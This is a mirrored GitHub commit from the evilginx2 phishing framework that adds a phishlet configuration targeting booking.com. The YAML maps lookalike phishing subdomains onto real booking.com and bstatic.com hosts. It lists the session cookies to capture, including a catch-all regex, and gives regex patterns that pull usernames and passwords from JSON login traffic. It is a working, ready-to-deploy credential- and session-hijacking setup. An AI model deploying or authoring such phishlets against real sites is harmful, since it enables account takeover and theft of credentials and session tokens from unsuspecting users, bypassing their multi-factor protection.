mirror of
https://github.com/kgretzky/evilginx2
synced 2026-06-08 15:15:53 +00:00
Add files via upload
This commit is contained in:
committed by
Kuba Gretzky
parent
d758b634d9
commit
cdb21aaac3
@@ -0,0 +1,27 @@
|
||||
author: '@Anonymous'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: 'accounts.booking' , orig_sub: '' , domain: 'booking.com', session: false, is_landing: true}
|
||||
- {phish_sub: 'account', orig_sub: 'account', domain: 'booking.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'secure' , orig_sub: 'secure' , domain: 'booking.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'www' , orig_sub: '' , domain: 'booking.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'join' , orig_sub: 'join' , domain: 'booking.com', session: false, is_landing: false}
|
||||
- {phish_sub: 'admin' , orig_sub: 'admin' , domain: 'booking.com', session: false, is_landing: false}
|
||||
- {phish_sub: 'q', orig_sub: 'q-cf', domain: 'bstatic.com', session: false, is_landing: false}
|
||||
- {phish_sub: 'r', orig_sub: 'r-cf', domain: 'bstatic.com', session: false, is_landing: false}
|
||||
sub_filters: []
|
||||
auth_tokens:
|
||||
- domain: '.booking.com'
|
||||
keys: ['bkng','.*,regexp']
|
||||
credentials:
|
||||
username:
|
||||
key: ''
|
||||
search: '"login_name":"([^"]*)'
|
||||
type: 'json'
|
||||
password:
|
||||
key: ''
|
||||
search: '"password":"([^"]*)'
|
||||
type: 'json'
|
||||
login:
|
||||
domain: 'account.booking.com'
|
||||
path: '/'
|
||||
Reference in New Issue
Block a user